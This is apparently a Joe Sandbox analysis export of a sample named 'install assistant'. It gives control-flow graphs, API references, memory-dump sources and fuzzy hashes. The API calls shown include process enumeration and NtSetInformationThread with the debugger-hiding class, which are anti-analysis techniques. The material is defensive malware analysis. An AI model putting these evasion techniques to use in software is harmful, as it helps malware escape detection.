                                                            control_flow_graph 7677 6cc15240-6cc15275 CreateToolhelp32Snapshot 7678 6cc152a0-6cc152a9 7677->7678 7679 6cc152e0-6cc152e5 7678->7679 7680 6cc152ab-6cc152b0 7678->7680 7683 6cc15377-6cc153a1 call 6cc22c05 7679->7683 7684 6cc152eb-6cc152f0 7679->7684 7681 6cc152b2-6cc152b7 7680->7681 7682 6cc15315-6cc1531a 7680->7682 7688 6cc15334-6cc1535d call 6cc1b920 Process32FirstW 7681->7688 7689 6cc152b9-6cc152be 7681->7689 7685 6cc15320-6cc15332 Process32NextW 7682->7685 7686 6cc153a6-6cc153ab 7682->7686 7683->7678 7690 6cc152f2-6cc152f7 7684->7690 7691 6cc15277-6cc15292 CloseHandle 7684->7691 7692 6cc15362-6cc15372 7685->7692 7686->7678 7695 6cc153b1-6cc153bf 7686->7695 7688->7692 7689->7678 7696 6cc152c0-6cc152d1 7689->7696 7690->7678 7697 6cc152f9-6cc15313 7690->7697 7691->7678 7692->7678 7696->7678 7697->7678
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC1524E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CreateSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3332741929-0
                                                            • Opcode ID: 87dd846ea281e53c4bd3c7f10c6b19193fe7de05d289af9dcc99257caddd3ac2
                                                            • Instruction ID: 7b23c44767fda4a64f5c0384d60757012248f4b1bd28d1d66052553f35ff7d22
                                                            • Opcode Fuzzy Hash: 87dd846ea281e53c4bd3c7f10c6b19193fe7de05d289af9dcc99257caddd3ac2
                                                            • Instruction Fuzzy Hash: DE319E7960C3409FD7109F2AC888B0ABBF4BF95348F91492DE588C7B60E375D8499B52

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7821 6ca93886-6ca9388e 7822 6ca93970-6ca9397d 7821->7822 7823 6ca93894-6ca93896 7821->7823 7825 6ca9397f-6ca93989 7822->7825 7826 6ca939f1-6ca939f8 7822->7826 7823->7822 7824 6ca9389c-6ca938b9 7823->7824 7827 6ca938c0-6ca938c1 7824->7827 7825->7824 7828 6ca9398f-6ca93994 7825->7828 7829 6ca939fe-6ca93a03 7826->7829 7830 6ca93ab5-6ca93aba 7826->7830 7831 6ca9395e 7827->7831 7833 6ca9399a-6ca9399f 7828->7833 7834 6ca93b16-6ca93b18 7828->7834 7835 6ca93a09-6ca93a2f 7829->7835 7836 6ca938d2-6ca938d4 7829->7836 7830->7824 7832 6ca93ac0-6ca93ac7 7830->7832 7840 6ca93960-6ca93964 7831->7840 7832->7827 7841 6ca93acd-6ca93ad6 7832->7841 7842 6ca9383b-6ca93855 call 6cbe1470 call 6cbe1480 7833->7842 7843 6ca939a5-6ca939bf 7833->7843 7834->7827 7837 6ca938f8-6ca93955 7835->7837 7838 6ca93a35-6ca93a3a 7835->7838 7839 6ca93957-6ca9395c 7836->7839 7837->7839 7844 6ca93b1d-6ca93b22 7838->7844 7845 6ca93a40-6ca93a57 7838->7845 7839->7831 7847 6ca9396a 7840->7847 7848 6ca93860-6ca93885 7840->7848 7841->7834 7849 6ca93ad8-6ca93aeb 7841->7849 7842->7848 7850 6ca93a5a-6ca93a5d 7843->7850 7856 6ca93b49-6ca93b50 7844->7856 7857 6ca93b24-6ca93b44 7844->7857 7845->7850 7853 6ca93ba1-6ca93bb6 7847->7853 7848->7821 7849->7837 7854 6ca93af1-6ca93af8 7849->7854 7851 6ca93aa9-6ca93ab0 7850->7851 7851->7840 7858 6ca93bc0-6ca93bda call 6cbe1470 call 6cbe1480 7853->7858 7860 6ca93afa-6ca93aff 7854->7860 7861 6ca93b62-6ca93b85 7854->7861 7856->7827 7864 6ca93b56-6ca93b5d 7856->7864 7857->7851 7872 6ca93be0-6ca93bfe 7858->7872 7860->7839 7861->7837 7865 6ca93b8b 7861->7865 7864->7840 7865->7853 7875 6ca93e7b 7872->7875 7876 6ca93c04-6ca93c11 7872->7876 7877 6ca93e81-6ca93ee0 call 6ca93750 GetCurrentThread NtSetInformationThread 7875->7877 7878 6ca93ce0-6ca93cea 7876->7878 7879 6ca93c17-6ca93c20 7876->7879 7894 6ca93eea-6ca93f04 call 6cbe1470 call 6cbe1480 7877->7894 7881 6ca93d3a-6ca93d3c 7878->7881 7882 6ca93cec-6ca93d0c 7878->7882 7883 6ca93dc5 7879->7883 7884 6ca93c26-6ca93c2d 7879->7884 7887 6ca93d3e-6ca93d45 7881->7887 7888 6ca93d70-6ca93d8d 7881->7888 7886 6ca93d90-6ca93d95 7882->7886 7889 6ca93dc6 7883->7889 7890 6ca93dc3 7884->7890 7891 6ca93c33-6ca93c3a 7884->7891 7896 6ca93dba-6ca93dc1 7886->7896 7897 6ca93d97-6ca93db8 7886->7897 7895 6ca93d50-6ca93d57 7887->7895 7888->7886 7898 6ca93dc8-6ca93dcc 7889->7898 7890->7883 7892 6ca93c40-6ca93c5b 7891->7892 7893 6ca93e26-6ca93e2b 7891->7893 7899 6ca93e1b-6ca93e24 7892->7899 7900 6ca93c7b-6ca93cd0 7893->7900 7901 6ca93e31 7893->7901 7915 6ca93f75-6ca93fa1 7894->7915 7895->7889 7896->7890 7903 6ca93dd7-6ca93ddc 7896->7903 7897->7883 7898->7872 7904 6ca93dd2 7898->7904 7899->7898 7905 6ca93e76-6ca93e79 7899->7905 7900->7895 7901->7858 7907 6ca93dde-6ca93e17 7903->7907 7908 6ca93e36-6ca93e3d 7903->7908 7904->7905 7905->7877 7907->7899 7909 6ca93e5c-6ca93e5f 7908->7909 7910 6ca93e3f-6ca93e5a 7908->7910 7909->7900 7913 6ca93e65-6ca93e69 7909->7913 7910->7899 7913->7898 7913->7905 7919 6ca94020-6ca94026 7915->7919 7920 6ca93fa3-6ca93fa8 7915->7920 7921 6ca9402c-6ca9403c 7919->7921 7922 6ca93f06-6ca93f35 7919->7922 7923 6ca9407c-6ca94081 7920->7923 7924 6ca93fae-6ca93fcf 7920->7924 7928 6ca9403e-6ca94058 7921->7928 7929 6ca940b3-6ca940b8 7921->7929 7927 6ca93f38-6ca93f61 7922->7927 7925 6ca940aa-6ca940ae 7923->7925 7926 6ca94083-6ca9408a 7923->7926 7924->7925 7930 6ca93f6b-6ca93f6f 7925->7930 7926->7927 7931 6ca94090 7926->7931 7933 6ca93f64-6ca93f67 7927->7933 7934 6ca9405a-6ca94063 7928->7934 7929->7924 7932 6ca940be-6ca940c9 7929->7932 7930->7915 7931->7894 7935 6ca940a7 7931->7935 7932->7925 7936 6ca940cb-6ca940d4 7932->7936 7937 6ca93f69 7933->7937 7938 6ca94069-6ca9406c 7934->7938 7939 6ca940f5-6ca9413f 7934->7939 7935->7925 7936->7935 7940 6ca940d6-6ca940f0 7936->7940 7937->7930 7942 6ca94072-6ca94077 7938->7942 7943 6ca94144-6ca9414b 7938->7943 7939->7937 7940->7934 7942->7933 7943->7930
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 820f56e8938da3f3ac0e53fbacb361879d1652e9afac8cbf102f8becc66ab1a3
                                                            • Instruction ID: b9f125fe55e91e2499b850c355f5eb2b62f3487380fed021e7b8c1515e413016
                                                            • Opcode Fuzzy Hash: 820f56e8938da3f3ac0e53fbacb361879d1652e9afac8cbf102f8becc66ab1a3
                                                            • Instruction Fuzzy Hash: DE32D232256B018FC324CF28C8D1695B7F3EF9131876D8A6DC0EA4BA95D775B48ACB50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7969 6ca93a6a-6ca93a85 7970 6ca93a87-6ca93aa7 7969->7970 7971 6ca93aa9-6ca93ab0 7970->7971 7972 6ca93960-6ca93964 7971->7972 7973 6ca9396a 7972->7973 7974 6ca93860-6ca9388e 7972->7974 7975 6ca93ba1-6ca93bb6 7973->7975 7984 6ca93970-6ca9397d 7974->7984 7985 6ca93894-6ca93896 7974->7985 7977 6ca93bc0-6ca93bda call 6cbe1470 call 6cbe1480 7975->7977 7991 6ca93be0-6ca93bfe 7977->7991 7988 6ca9397f-6ca93989 7984->7988 7989 6ca939f1-6ca939f8 7984->7989 7985->7984 7986 6ca9389c-6ca938b9 7985->7986 7990 6ca938c0-6ca938c1 7986->7990 7988->7986 7992 6ca9398f-6ca93994 7988->7992 7993 6ca939fe-6ca93a03 7989->7993 7994 6ca93ab5-6ca93aba 7989->7994 7995 6ca9395e 7990->7995 8013 6ca93e7b 7991->8013 8014 6ca93c04-6ca93c11 7991->8014 7998 6ca9399a-6ca9399f 7992->7998 7999 6ca93b16-6ca93b18 7992->7999 8000 6ca93a09-6ca93a2f 7993->8000 8001 6ca938d2-6ca938d4 7993->8001 7994->7986 7996 6ca93ac0-6ca93ac7 7994->7996 7995->7972 7996->7990 8005 6ca93acd-6ca93ad6 7996->8005 8007 6ca9383b-6ca93855 call 6cbe1470 call 6cbe1480 7998->8007 8008 6ca939a5-6ca939bf 7998->8008 7999->7990 8002 6ca938f8-6ca93955 8000->8002 8003 6ca93a35-6ca93a3a 8000->8003 8004 6ca93957-6ca9395c 8001->8004 8002->8004 8009 6ca93b1d-6ca93b22 8003->8009 8010 6ca93a40-6ca93a57 8003->8010 8004->7995 8005->7999 8012 6ca93ad8-6ca93aeb 8005->8012 8007->7974 8015 6ca93a5a-6ca93a5d 8008->8015 8019 6ca93b49-6ca93b50 8009->8019 8020 6ca93b24-6ca93b44 8009->8020 8010->8015 8012->8002 8018 6ca93af1-6ca93af8 8012->8018 8017 6ca93e81-6ca93ee0 call 6ca93750 GetCurrentThread NtSetInformationThread 8013->8017 8021 6ca93ce0-6ca93cea 8014->8021 8022 6ca93c17-6ca93c20 8014->8022 8015->7971 8043 6ca93eea-6ca93f04 call 6cbe1470 call 6cbe1480 8017->8043 8027 6ca93afa-6ca93aff 8018->8027 8028 6ca93b62-6ca93b85 8018->8028 8019->7990 8031 6ca93b56-6ca93b5d 8019->8031 8020->7970 8024 6ca93d3a-6ca93d3c 8021->8024 8025 6ca93cec-6ca93d0c 8021->8025 8029 6ca93dc5 8022->8029 8030 6ca93c26-6ca93c2d 8022->8030 8035 6ca93d3e-6ca93d45 8024->8035 8036 6ca93d70-6ca93d8d 8024->8036 8034 6ca93d90-6ca93d95 8025->8034 8027->8004 8028->8002 8032 6ca93b8b 8028->8032 8038 6ca93dc6 8029->8038 8039 6ca93dc3 8030->8039 8040 6ca93c33-6ca93c3a 8030->8040 8031->7972 8032->7975 8045 6ca93dba-6ca93dc1 8034->8045 8046 6ca93d97-6ca93db8 8034->8046 8044 6ca93d50-6ca93d57 8035->8044 8036->8034 8047 6ca93dc8-6ca93dcc 8038->8047 8039->8029 8041 6ca93c40-6ca93c5b 8040->8041 8042 6ca93e26-6ca93e2b 8040->8042 8048 6ca93e1b-6ca93e24 8041->8048 8049 6ca93c7b-6ca93cd0 8042->8049 8050 6ca93e31 8042->8050 8064 6ca93f75-6ca93fa1 8043->8064 8044->8038 8045->8039 8052 6ca93dd7-6ca93ddc 8045->8052 8046->8029 8047->7991 8053 6ca93dd2 8047->8053 8048->8047 8054 6ca93e76-6ca93e79 8048->8054 8049->8044 8050->7977 8056 6ca93dde-6ca93e17 8052->8056 8057 6ca93e36-6ca93e3d 8052->8057 8053->8054 8054->8017 8056->8048 8058 6ca93e5c-6ca93e5f 8057->8058 8059 6ca93e3f-6ca93e5a 8057->8059 8058->8049 8062 6ca93e65-6ca93e69 8058->8062 8059->8048 8062->8047 8062->8054 8068 6ca94020-6ca94026 8064->8068 8069 6ca93fa3-6ca93fa8 8064->8069 8070 6ca9402c-6ca9403c 8068->8070 8071 6ca93f06-6ca93f35 8068->8071 8072 6ca9407c-6ca94081 8069->8072 8073 6ca93fae-6ca93fcf 8069->8073 8077 6ca9403e-6ca94058 8070->8077 8078 6ca940b3-6ca940b8 8070->8078 8076 6ca93f38-6ca93f61 8071->8076 8074 6ca940aa-6ca940ae 8072->8074 8075 6ca94083-6ca9408a 8072->8075 8073->8074 8079 6ca93f6b-6ca93f6f 8074->8079 8075->8076 8080 6ca94090 8075->8080 8082 6ca93f64-6ca93f67 8076->8082 8083 6ca9405a-6ca94063 8077->8083 8078->8073 8081 6ca940be-6ca940c9 8078->8081 8079->8064 8080->8043 8084 6ca940a7 8080->8084 8081->8074 8085 6ca940cb-6ca940d4 8081->8085 8086 6ca93f69 8082->8086 8087 6ca94069-6ca9406c 8083->8087 8088 6ca940f5-6ca9413f 8083->8088 8084->8074 8085->8084 8089 6ca940d6-6ca940f0 8085->8089 8086->8079 8091 6ca94072-6ca94077 8087->8091 8092 6ca94144-6ca9414b 8087->8092 8088->8086 8089->8083 8091->8082 8092->8079
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: 7ba203476026fe971f93f4ab3b6268cf8f99a597c97fda17beea317211b56d9c
                                                            • Instruction ID: 5bcace41b7c5d9cc2d0fd00acb33f5eef684f4d4717d3ce42b3662c239e51ebb
                                                            • Opcode Fuzzy Hash: 7ba203476026fe971f93f4ab3b6268cf8f99a597c97fda17beea317211b56d9c
                                                            • Instruction Fuzzy Hash: 9F5104311267018FC320CF29C481795B7F3BF95314F698B1DC0EA5BA95DB74B48A8B51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: 1177bd0b3d5750a7de1d6cf7eee82036ad09b0d576eb641d7622917a7aad2bae
                                                            • Instruction ID: 04f8e76d15aee0e3767af1142682464b8aab5bb646ba701c5cf3b2842706bab6
                                                            • Opcode Fuzzy Hash: 1177bd0b3d5750a7de1d6cf7eee82036ad09b0d576eb641d7622917a7aad2bae
                                                            • Instruction Fuzzy Hash: 6751E531125B018FC720CF29C481795B7F3BF85318F698B1DC0EA5BA95DB75B48A8B51
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6CA93E9D
                                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CA93EAA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentInformation
                                                            • String ID:
                                                            • API String ID: 1650627709-0
                                                            • Opcode ID: b6a929b0a24459af381ec57ba807734be332eb743cda199037999248aae8ba38
                                                            • Instruction ID: 9617b09aa41c99d2de4985551072c5de1d476b2af73bd2ed06a3a0df110532fe
                                                            • Opcode Fuzzy Hash: b6a929b0a24459af381ec57ba807734be332eb743cda199037999248aae8ba38
                                                            • Instruction Fuzzy Hash: D0312431226B018FD720CF28C8957C6B7F3AF96318F294E1DC0EA5BA91DB7474898B51
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6CA93E9D
                                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CA93EAA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentInformation
                                                            • String ID:
                                                            • API String ID: 1650627709-0
                                                            • Opcode ID: 17ffa31ce84b43e4d87a7ca5b1430dfdfe3a8a2aae5ace916bc256508a04e3fe
                                                            • Instruction ID: 9b9eb8503f0123be689e7cfba2d65978a6967e01fc17ef006215064a18cdc1e3
                                                            • Opcode Fuzzy Hash: 17ffa31ce84b43e4d87a7ca5b1430dfdfe3a8a2aae5ace916bc256508a04e3fe
                                                            • Instruction Fuzzy Hash: 0C312131125B018BD720CF28C492796B7F6AF86308F294E1DC0EA4BA95DB717489CB91
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6CA93E9D
                                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CA93EAA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentInformation
                                                            • String ID:
                                                            • API String ID: 1650627709-0
                                                            • Opcode ID: 9181bf26d263ad32055439d6fbfa81346c36c232d5ffe48ab4e5fc421d43d794
                                                            • Instruction ID: 825a1f1696afe94bce4ee401432f87597bd80e77d24c85ff093252ea79b1a56e
                                                            • Opcode Fuzzy Hash: 9181bf26d263ad32055439d6fbfa81346c36c232d5ffe48ab4e5fc421d43d794
                                                            • Instruction Fuzzy Hash: 5E2108312297018BD724CF24C89279A77F6AF46308F284E1DC0FB8BA95DB7574858B51
                                                            APIs
                                                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC15130
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ManagerOpen
                                                            • String ID:
                                                            • API String ID: 1889721586-0
                                                            • Opcode ID: 05a1ac7d8d3a300c4d0ff21ea434b40bf1affd9e92bbe205c912d8cae56f208a
                                                            • Instruction ID: 8e2837602185aa791f0e52c9dc977414cc13ad2b09535d6a091771458fcceb2a
                                                            • Opcode Fuzzy Hash: 05a1ac7d8d3a300c4d0ff21ea434b40bf1affd9e92bbe205c912d8cae56f208a
                                                            • Instruction Fuzzy Hash: EE3149B460C301EFC7118F2AC545A4ABBF0FB89768F60895AF988C6760D331C845AB52
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 6CC0AEDC
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 67b48f57c7f4b646e4a9ee22ae6830ead9206950cdb4320f1b426858709619c3
                                                            • Instruction ID: caed01070995377cd8f8208fbdd6eccf9873616e5bc5f9f2a10957ac0b136757
                                                            • Opcode Fuzzy Hash: 67b48f57c7f4b646e4a9ee22ae6830ead9206950cdb4320f1b426858709619c3
                                                            • Instruction Fuzzy Hash: 601148B4608350AFD7108F29D54454EBBE4BFC6314F148E59F4A8CBB91E331CC858B22
                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CBEABA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                                            • API String ID: 2738559852-1563143607
                                                            • Opcode ID: f8440fc47e2323235753538706c7de72dab44638a2c6f5ae528e562e1a004263
                                                            • Instruction ID: 90afdd66205b8eafd8435c8b93ea19d58e3fce6a39972616a07d37fd2bce7886
                                                            • Opcode Fuzzy Hash: f8440fc47e2323235753538706c7de72dab44638a2c6f5ae528e562e1a004263
                                                            • Instruction Fuzzy Hash: 896257706093818FC724CF28C490A5ABBF6ABC9B84F248D1EE999CB751D734D8468F53

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
